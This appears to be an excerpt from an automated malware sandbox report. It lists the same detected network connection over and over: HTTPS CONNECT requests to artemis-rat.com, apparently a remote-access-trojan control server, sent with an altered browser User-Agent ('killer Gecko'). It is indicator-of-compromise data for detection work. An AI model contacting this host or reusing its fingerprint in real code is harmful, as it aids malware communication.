                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.com
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
